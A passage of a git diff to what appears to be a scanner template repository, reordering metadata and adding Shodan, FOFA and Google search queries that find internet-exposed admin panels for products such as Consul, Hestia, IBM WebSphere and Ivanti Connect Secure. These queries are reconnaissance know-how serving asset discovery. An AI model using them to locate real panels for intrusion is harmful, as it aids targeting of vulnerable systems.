title:"Overview – Hangfire Dashboard" - vendor: hangfire verified: true + max-request: 2 + vendor: hangfire + product: hangfire + shodan-query: + - title:"Overview – Hangfire Dashboard" + - http.title:"overview – hangfire dashboard" + fofa-query: title="overview – hangfire dashboard" + google-query: intitle:"overview – hangfire dashboard" tags: panel,hangfire http: diff --git a/http/exposed-panels/harbor-panel.yaml b/http/exposed-panels/harbor-panel.yaml index 7032e8eda7..805d54c476 100644 --- a/http/exposed-panels/harbor-panel.yaml +++ b/http/exposed-panels/harbor-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: linuxfoundation product: harbor shodan-query: http.favicon.hash:657337228 - vendor: linuxfoundation - verified: true + fofa-query: icon_hash=657337228 tags: panel,harbor,linuxfoundation http: diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index 67ace0f535..a010894875 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -11,8 +11,13 @@ info: cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: consul vendor: hashicorp + product: consul + shodan-query: + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: tech,consul,api,panel,hashicorp http: diff --git a/http/exposed-panels/hashicorp-consul-webgui.yaml b/http/exposed-panels/hashicorp-consul-webgui.yaml index 8ec7e31d62..ff3167473f 100644 --- a/http/exposed-panels/hashicorp-consul-webgui.yaml +++ b/http/exposed-panels/hashicorp-consul-webgui.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: consul - shodan-query: http.title:"Consul by HashiCorp" vendor: hashicorp + product: consul + shodan-query: + - http.title:"Consul by HashiCorp" + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: consul,webserver,panel,hashicorp http: diff --git a/http/exposed-panels/hestia-panel.yaml b/http/exposed-panels/hestia-panel.yaml index e175750dee..ef129b28de 100644 --- a/http/exposed-panels/hestia-panel.yaml +++ b/http/exposed-panels/hestia-panel.yaml @@ -12,11 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: control_panel - shodan-query: title:"Hestia Control Panel" - vendor: hestiacp verified: true + max-request: 1 + vendor: hestiacp + product: control_panel + shodan-query: + - title:"Hestia Control Panel" + - http.favicon.hash:-476299640 + - http.title:"hestia control panel" + fofa-query: + - icon_hash=-476299640 + - title="hestia control panel" + google-query: intitle:"hestia control panel" tags: panel,hestia,detect,hestiacp http: diff --git a/http/exposed-panels/highmail-admin-panel.yaml b/http/exposed-panels/highmail-admin-panel.yaml index 7339331159..572b5269e2 100644 --- a/http/exposed-panels/highmail-admin-panel.yaml +++ b/http/exposed-panels/highmail-admin-panel.yaml @@ -9,12 +9,17 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="HighMail" - max-request: 2 - product: high_cms - shodan-query: title:"HighMail" - vendor: aryanic verified: true + max-request: 2 + vendor: aryanic + product: high_cms + shodan-query: + - title:"HighMail" + - http.title:"highmail" + fofa-query: + - title="HighMail" + - title="highmail" + google-query: intitle:"highmail" tags: highmail,panel,aryanic http: diff --git a/http/exposed-panels/hivemanager-login-panel.yaml b/http/exposed-panels/hivemanager-login-panel.yaml index f499040a7b..a7768cb9ee 100644 --- a/http/exposed-panels/hivemanager-login-panel.yaml +++ b/http/exposed-panels/hivemanager-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1604363273 - verified: true tags: panel,hivemanager,aerohive http: diff --git a/http/exposed-panels/hmc-hybris-panel.yaml b/http/exposed-panels/hmc-hybris-panel.yaml index 55a61328fc..054d578380 100644 --- a/http/exposed-panels/hmc-hybris-panel.yaml +++ b/http/exposed-panels/hmc-hybris-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:sap:hybris:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: hybris vendor: sap + product: hybris + shodan-query: http.title:"hybris" + fofa-query: title="hybris" + google-query: intitle:"hybris" tags: panel,sap http: diff --git a/http/exposed-panels/home-assistant-panel.yaml b/http/exposed-panels/home-assistant-panel.yaml index 918fe8826e..bf3ba86c32 100644 --- a/http/exposed-panels/home-assistant-panel.yaml +++ b/http/exposed-panels/home-assistant-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Home Assistant" - verified: true tags: panel,iot,homeassistant http: diff --git a/http/exposed-panels/homebridge-panel.yaml b/http/exposed-panels/homebridge-panel.yaml index 436b05a6e9..33d2b5a2d2 100644 --- a/http/exposed-panels/homebridge-panel.yaml +++ b/http/exposed-panels/homebridge-panel.yaml @@ -10,9 +10,9 @@ info: - https://homebridge.io/ - https://github.com/homebridge metadata: + verified: true max-request: 1 shodan-query: title:"Homebridge" - verified: true tags: panel,homebridge,detect http: diff --git a/http/exposed-panels/homematic-panel.yaml b/http/exposed-panels/homematic-panel.yaml index f22258f2ff..38d2eb720c 100644 --- a/http/exposed-panels/homematic-panel.yaml +++ b/http/exposed-panels/homematic-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:o:eq-3:homematic_ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: homematic_ccu3_firmware - shodan-query: http.html:"Homematic" vendor: eq-3 + product: homematic_ccu3_firmware + shodan-query: + - http.html:"Homematic" + - http.html:"homematic" + fofa-query: body="homematic" tags: panel,homematic,iot,eq-3 http: diff --git a/http/exposed-panels/homer-panel.yaml b/http/exposed-panels/homer-panel.yaml index 6f52a2f2c2..fa28452b08 100644 --- a/http/exposed-panels/homer-panel.yaml +++ b/http/exposed-panels/homer-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/bastienwirtz/homer - https://homer-demo.netlify.app/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-417785140 - verified: true tags: panel,homer,detect,login http: diff --git a/http/exposed-panels/honeywell-xl-web-controller.yaml b/http/exposed-panels/honeywell-xl-web-controller.yaml index 6c8502736e..a8479afea4 100644 --- a/http/exposed-panels/honeywell-xl-web-controller.yaml +++ b/http/exposed-panels/honeywell-xl-web-controller.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Honeywell XL Web Controller" - verified: true tags: panel,honeywell,edb http: diff --git a/http/exposed-panels/horde-login-panel.yaml b/http/exposed-panels/horde-login-panel.yaml index 90710f29b8..57b8e41b17 100644 --- a/http/exposed-panels/horde-login-panel.yaml +++ b/http/exposed-panels/horde-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-741491222 - verified: true tags: horde,panel http: diff --git a/http/exposed-panels/horde-webmail-login.yaml b/http/exposed-panels/horde-webmail-login.yaml index ada60681b0..853a9a7b2c 100644 --- a/http/exposed-panels/horde-webmail-login.yaml +++ b/http/exposed-panels/horde-webmail-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:2104916232 - verified: true tags: horde,webmail,panel http: diff --git a/http/exposed-panels/hospital-management-panel.yaml b/http/exposed-panels/hospital-management-panel.yaml index b11d86c86d..d3ec143bac 100644 --- a/http/exposed-panels/hospital-management-panel.yaml +++ b/http/exposed-panels/hospital-management-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: hospital_management_system - shodan-query: http.html:"Hospital Management System" - vendor: hospital_management_system_project verified: true + max-request: 1 + vendor: hospital_management_system_project + product: hospital_management_system + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" + fofa-query: body="hospital management system" tags: panel,hms,cms,hospital_management_system_project http: diff --git a/http/exposed-panels/hp-ilo-5.yaml b/http/exposed-panels/hp-ilo-5.yaml index c14ff4693c..cafaf9b473 100644 --- a/http/exposed-panels/hp-ilo-5.yaml +++ b/http/exposed-panels/hp-ilo-5.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:h:hpe:integrated_lights-out_5:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: integrated_lights-out_5 vendor: hpe + product: integrated_lights-out_5 tags: hp,ilo,panel,hpe http: diff --git a/http/exposed-panels/hp-service-manager.yaml b/http/exposed-panels/hp-service-manager.yaml index 79a93c2f95..10bea7f586 100644 --- a/http/exposed-panels/hp-service-manager.yaml +++ b/http/exposed-panels/hp-service-manager.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:hp:service_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: service_manager - shodan-query: http.title:"HP Service Manager" vendor: hp + product: service_manager + shodan-query: + - http.title:"HP Service Manager" + - http.title:"hp service manager" + fofa-query: title="hp service manager" + google-query: intitle:"hp service manager" tags: panel,hp,service http: diff --git a/http/exposed-panels/hybris-administration-console.yaml b/http/exposed-panels/hybris-administration-console.yaml index f1d5fe80fc..9a0be035b9 100644 --- a/http/exposed-panels/hybris-administration-console.yaml +++ b/http/exposed-panels/hybris-administration-console.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sap:hybris:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: hybris - shodan-query: title:"Hybris" - vendor: sap verified: true + max-request: 1 + vendor: sap + product: hybris + shodan-query: + - title:"Hybris" + - http.title:"hybris" + fofa-query: title="hybris" + google-query: intitle:"hybris" tags: panel,hybris,sap http: diff --git a/http/exposed-panels/hydra-dashboard.yaml b/http/exposed-panels/hydra-dashboard.yaml index 3bd3390591..26f5e51099 100644 --- a/http/exposed-panels/hydra-dashboard.yaml +++ b/http/exposed-panels/hydra-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hydra_project:hydra:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: hydra - shodan-query: title:"Hydra Router Dashboard" - vendor: hydra_project verified: true + max-request: 1 + vendor: hydra_project + product: hydra + shodan-query: + - title:"Hydra Router Dashboard" + - http.title:"hydra router dashboard" + fofa-query: title="hydra router dashboard" + google-query: intitle:"hydra router dashboard" tags: panel,exposure,hydra,hydra_project http: diff --git a/http/exposed-panels/hypertest-dashboard.yaml b/http/exposed-panels/hypertest-dashboard.yaml index a3347248a1..8be49d0851 100644 --- a/http/exposed-panels/hypertest-dashboard.yaml +++ b/http/exposed-panels/hypertest-dashboard.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"HyperTest" - verified: true tags: panel,exposure,hypertest http: diff --git a/http/exposed-panels/i-mscp-panel.yaml b/http/exposed-panels/i-mscp-panel.yaml index 4a876cbdb8..b3449ca29f 100644 --- a/http/exposed-panels/i-mscp-panel.yaml +++ b/http/exposed-panels/i-mscp-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"i-MSCP - Multi Server Control Panel" - verified: true tags: panel,i-mscp,detect http: diff --git a/http/exposed-panels/ibm-openadmin-panel.yaml b/http/exposed-panels/ibm-openadmin-panel.yaml index 7f69841051..2e71dd8946 100644 --- a/http/exposed-panels/ibm-openadmin-panel.yaml +++ b/http/exposed-panels/ibm-openadmin-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: info metadata: + verified: "true" max-request: 1 shodan-query: http.favicon.hash:965982073 - verified: "true" tags: openadmin,login,panel http: diff --git a/http/exposed-panels/ibm/ibm-dcec-panel.yaml b/http/exposed-panels/ibm/ibm-dcec-panel.yaml index 96828144b3..959675e44b 100644 --- a/http/exposed-panels/ibm/ibm-dcec-panel.yaml +++ b/http/exposed-panels/ibm/ibm-dcec-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise metadata: + verified: true max-request: 1 shodan-query: html:"Decision Center Enterprise console" - verified: true tags: panel,ibm,login,detect,decision-center http: diff --git a/http/exposed-panels/ibm/ibm-decision-server-console.yaml b/http/exposed-panels/ibm/ibm-decision-server-console.yaml index 33817f5e93..e9d078e1d4 100644 --- a/http/exposed-panels/ibm/ibm-decision-server-console.yaml +++ b/http/exposed-panels/ibm/ibm-decision-server-console.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ibm.com/docs/en/odm/8.12.0?topic=overview-introducing-rule-execution-server metadata: + verified: true max-request: 1 shodan-query: title:"Rule Execution Server" - verified: true tags: panel,ibm,login,detect,decision-server http: diff --git a/http/exposed-panels/ibm/ibm-maximo-login.yaml b/http/exposed-panels/ibm/ibm-maximo-login.yaml index 177f699210..20cb13ad9a 100644 --- a/http/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/http/exposed-panels/ibm/ibm-maximo-login.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ibm:maximo_asset_management:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: ibm product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 - vendor: ibm - verified: true + fofa-query: icon_hash=-399298961 tags: maximo,panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml index e64a34a971..b041159502 100644 --- a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml +++ b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:ibm:mq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: mq vendor: ibm + product: mq tags: panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-note-login.yaml b/http/exposed-panels/ibm/ibm-note-login.yaml index c083983300..ba34bbf349 100644 --- a/http/exposed-panels/ibm/ibm-note-login.yaml +++ b/http/exposed-panels/ibm/ibm-note-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:ibm:inotes:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: inotes vendor: ibm + product: inotes tags: ibm,edb,panel http: diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml index 117df78337..9ba7feee8d 100644 --- a/http/exposed-panels/ibm/ibm-odm-panel.yaml +++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ibm.com/docs/en/odm/8.12.0 metadata: - fofa-query: title="Decision Center | Business Console" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="Decision Center | Business Console" tags: panel,ibm,login,detect,decision-center http: diff --git a/http/exposed-panels/ibm/ibm-security-access-manager.yaml b/http/exposed-panels/ibm/ibm-security-access-manager.yaml index c751cbec14..b4b94a9bf6 100644 --- a/http/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/http/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:ibm:security_access_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: security_access_manager vendor: ibm + product: security_access_manager tags: panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml index 5bc5d81de3..377403ebcc 100644 --- a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:z\/os:*:*:* metadata: + verified: true max-request: 1 + vendor: ibm product: websphere_application_server shodan-query: http.favicon.hash:1337147129 - vendor: ibm - verified: true + fofa-query: icon_hash=1337147129 tags: websphere,panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-websphere-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-panel.yaml index 0d6156006b..e70b6ff24a 100644 --- a/http/exposed-panels/ibm/ibm-websphere-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:ibm:websphere_portal:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: websphere_portal - shodan-query: http.html:"IBM WebSphere Portal" vendor: ibm + product: websphere_portal + shodan-query: + - http.html:"IBM WebSphere Portal" + - http.html:"ibm websphere portal" + - cpe:"cpe:2.3:a:ibm:websphere_portal" + fofa-query: body="ibm websphere portal" tags: ibm,websphere,panel http: diff --git a/http/exposed-panels/icc-pro-login.yaml b/http/exposed-panels/icc-pro-login.yaml index 77c85504cc..c4db2e584e 100644 --- a/http/exposed-panels/icc-pro-login.yaml +++ b/http/exposed-panels/icc-pro-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Login to ICC PRO system" - verified: true tags: panel,icc-pro,edb http: diff --git a/http/exposed-panels/icewarp-panel-detect.yaml b/http/exposed-panels/icewarp-panel-detect.yaml index ed973c706f..de27380f66 100644 --- a/http/exposed-panels/icewarp-panel-detect.yaml +++ b/http/exposed-panels/icewarp-panel-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: icewarp_server - shodan-query: title:"icewarp" - vendor: icewarp verified: true + max-request: 1 + vendor: icewarp + product: icewarp_server + shodan-query: + - title:"icewarp" + - http.title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: icewarp,panel http: diff --git a/http/exposed-panels/icinga-web-login.yaml b/http/exposed-panels/icinga-web-login.yaml index 0f66a0a299..607c07a846 100644 --- a/http/exposed-panels/icinga-web-login.yaml +++ b/http/exposed-panels/icinga-web-login.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: icinga_web_2 - shodan-query: http.title:"Icinga Web 2 Login" vendor: icinga + product: icinga_web_2 + shodan-query: + - http.title:"Icinga Web 2 Login" + - http.title:"icinga" + - http.title:"icinga web 2 login" + fofa-query: + - title="icinga web 2 login" + - title="icinga" + google-query: + - intitle:"icinga web 2 login" + - intitle:"icinga" tags: panel,icinga http: diff --git a/http/exposed-panels/iclock-admin-panel.yaml b/http/exposed-panels/iclock-admin-panel.yaml index a2a177d802..7dbc42947c 100644 --- a/http/exposed-panels/iclock-admin-panel.yaml +++ b/http/exposed-panels/iclock-admin-panel.yaml @@ -8,9 +8,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"iClock Automatic" - verified: true tags: panel,iclock,login,admin http: diff --git a/http/exposed-panels/ictprotege-login-panel.yaml b/http/exposed-panels/ictprotege-login-panel.yaml index e511dfea5b..8306ddbe90 100644 --- a/http/exposed-panels/ictprotege-login-panel.yaml +++ b/http/exposed-panels/ictprotege-login-panel.yaml @@ -9,11 +9,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:ict:protege_wx_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: protege_wx_firmware - shodan-query: title:"ICT Protege WX®" - vendor: ict verified: true + max-request: 1 + vendor: ict + product: protege_wx_firmware + shodan-query: + - title:"ICT Protege WX®" + - http.title:"ict protege wx®" + fofa-query: title="ict protege wx®" + google-query: intitle:"ict protege wx®" tags: panel,ictprotege,ict http: diff --git a/http/exposed-panels/identity-services-engine.yaml b/http/exposed-panels/identity-services-engine.yaml index 7515087915..0717c418cf 100644 --- a/http/exposed-panels/identity-services-engine.yaml +++ b/http/exposed-panels/identity-services-engine.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: identity_services_engine - shodan-query: http.title:"Identity Services Engine" vendor: cisco + product: identity_services_engine + shodan-query: + - http.title:"Identity Services Engine" + - http.title:"identity services engine" + fofa-query: title="identity services engine" + google-query: intitle:"identity services engine" tags: panel,cisco http: diff --git a/http/exposed-panels/ilch-admin-panel.yaml b/http/exposed-panels/ilch-admin-panel.yaml index 6d14559f55..8a4bf37643 100644 --- a/http/exposed-panels/ilch-admin-panel.yaml +++ b/http/exposed-panels/ilch-admin-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ilch:cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cms - shodan-query: http.title:"Ilch" - vendor: ilch verified: true + max-request: 1 + vendor: ilch + product: cms + shodan-query: + - http.title:"Ilch" + - http.title:"ilch" + fofa-query: title="ilch" + google-query: intitle:"ilch" tags: panel,ilch,cms http: diff --git a/http/exposed-panels/ilias-panel.yaml b/http/exposed-panels/ilias-panel.yaml index 279a62451a..e3e363907e 100644 --- a/http/exposed-panels/ilias-panel.yaml +++ b/http/exposed-panels/ilias-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: ilias - shodan-query: http.html:"ILIAS" - vendor: ilias verified: true + max-request: 2 + vendor: ilias + product: ilias + shodan-query: + - http.html:"ILIAS" + - http.html:"ilias" + fofa-query: body="ilias" tags: panel,ilias http: diff --git a/http/exposed-panels/immich-panel.yaml b/http/exposed-panels/immich-panel.yaml index d45707b487..c20599872b 100644 --- a/http/exposed-panels/immich-panel.yaml +++ b/http/exposed-panels/immich-panel.yaml @@ -10,9 +10,9 @@ info: - https://immich.app/ - https://github.com/immich-app/immich metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-43504595 - verified: true tags: panel,immich,detect http: diff --git a/http/exposed-panels/incapptic-connect-panel.yaml b/http/exposed-panels/incapptic-connect-panel.yaml index 9aceccc8f0..93023cfc87 100644 --- a/http/exposed-panels/incapptic-connect-panel.yaml +++ b/http/exposed-panels/incapptic-connect-panel.yaml @@ -13,11 +13,15 @@ info: cpe: cpe:2.3:a:ivanti:incapptic_connect:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ivanti product: incapptic_connect shodan-query: - http.title:"incapptic" - http.favicon.hash:-1067582922 - vendor: ivanti + fofa-query: + - icon_hash=-1067582922 + - title="incapptic" + google-query: intitle:"incapptic" tags: panel,ivanti,incapptic-connect http: diff --git a/http/exposed-panels/influxdb-panel.yaml b/http/exposed-panels/influxdb-panel.yaml index d80a7113fe..bd08d14dea 100644 --- a/http/exposed-panels/influxdb-panel.yaml +++ b/http/exposed-panels/influxdb-panel.yaml @@ -13,9 +13,14 @@ info: cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: influxdb - shodan-query: http.title:"InfluxDB - Admin Interface" vendor: influxdata + product: influxdb + shodan-query: + - http.title:"InfluxDB - Admin Interface" + - http.title:"influxdb - admin interface" + - influxdb + fofa-query: title="influxdb - admin interface" + google-query: intitle:"influxdb - admin interface" tags: panel,influxdb,influxdata http: diff --git a/http/exposed-panels/intelbras-login.yaml b/http/exposed-panels/intelbras-login.yaml index 414f0b785f..91bb5b9671 100644 --- a/http/exposed-panels/intelbras-login.yaml +++ b/http/exposed-panels/intelbras-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Intelbras" "All Rights Reserved" -.com max-request: 1 shodan-query: http.title:"Intelbras" + google-query: intitle:"Intelbras" "All Rights Reserved" -.com tags: panel,edb http: diff --git a/http/exposed-panels/intelbras-panel.yaml b/http/exposed-panels/intelbras-panel.yaml index 40b7816458..7249bf9337 100644 --- a/http/exposed-panels/intelbras-panel.yaml +++ b/http/exposed-panels/intelbras-panel.yaml @@ -10,12 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:intelbras:cip_92200_firmware:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Intelbras" - max-request: 1 - product: cip_92200_firmware - shodan-query: http.title:"Intelbras" - vendor: intelbras verified: true + max-request: 1 + vendor: intelbras + product: cip_92200_firmware + shodan-query: + - http.title:"Intelbras" + - http.title:"intelbras" + fofa-query: + - app="Intelbras" + - title="intelbras" + - app="intelbras" + google-query: intitle:"intelbras" tags: panel,intelbras http: diff --git a/http/exposed-panels/intellian-aptus-panel.yaml b/http/exposed-panels/intellian-aptus-panel.yaml index 9aad1b4290..ce03aadef1 100644 --- a/http/exposed-panels/intellian-aptus-panel.yaml +++ b/http/exposed-panels/intellian-aptus-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:intelliantech:aptus_web:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aptus_web - shodan-query: http.title:"Intellian Aptus Web" vendor: intelliantech + product: aptus_web + shodan-query: + - http.title:"Intellian Aptus Web" + - http.title:"intellian aptus web" + fofa-query: title="intellian aptus web" + google-query: intitle:"intellian aptus web" tags: panel,intellian,aptus,intelliantech http: diff --git a/http/exposed-panels/interactsoftware-interact.yaml b/http/exposed-panels/interactsoftware-interact.yaml index 74bdb6aa8c..40075e0d5c 100644 --- a/http/exposed-panels/interactsoftware-interact.yaml +++ b/http/exposed-panels/interactsoftware-interact.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.interactsoftware.com metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,interactsoftware,interact,detect http: diff --git a/http/exposed-panels/ipdiva-mediation-panel.yaml b/http/exposed-panels/ipdiva-mediation-panel.yaml index e5720f2222..e636f39621 100644 --- a/http/exposed-panels/ipdiva-mediation-panel.yaml +++ b/http/exposed-panels/ipdiva-mediation-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"IPdiva" - verified: true tags: panel,ipdiva,mediation http: diff --git a/http/exposed-panels/isams-panel.yaml b/http/exposed-panels/isams-panel.yaml index 66d0ec9459..7837a02406 100644 --- a/http/exposed-panels/isams-panel.yaml +++ b/http/exposed-panels/isams-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.isams.com/platform/the-platform metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-81573405 - verified: true tags: panel,isams,login http: diff --git a/http/exposed-panels/issabel-login.yaml b/http/exposed-panels/issabel-login.yaml index 0d43d96a38..d4936e2ca1 100644 --- a/http/exposed-panels/issabel-login.yaml +++ b/http/exposed-panels/issabel-login.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Issabel" max-request: 1 + fofa-query: title="Issabel" tags: issabel,panel http: diff --git a/http/exposed-panels/itop-panel.yaml b/http/exposed-panels/itop-panel.yaml index e6a684bafc..ee42fe7ea1 100644 --- a/http/exposed-panels/itop-panel.yaml +++ b/http/exposed-panels/itop-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: itop vendor: combodo + product: itop tags: panel,itop,combodo http: diff --git a/http/exposed-panels/ivanti-connect-secure-panel.yaml b/http/exposed-panels/ivanti-connect-secure-panel.yaml index 6c9690d6e6..f03f78c634 100644 --- a/http/exposed-panels/ivanti-connect-secure-panel.yaml +++ b/http/exposed-panels/ivanti-connect-secure-panel.yaml @@ -11,11 +11,18 @@ info: classification: cpe: cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: connect_secure - shodan-query: title:"Ivanti Connect Secure" - vendor: ivanti verified: true + max-request: 2 + vendor: ivanti + product: connect_secure + shodan-query: + - title:"Ivanti Connect Secure" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - title="ivanti connect secure" + - body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: 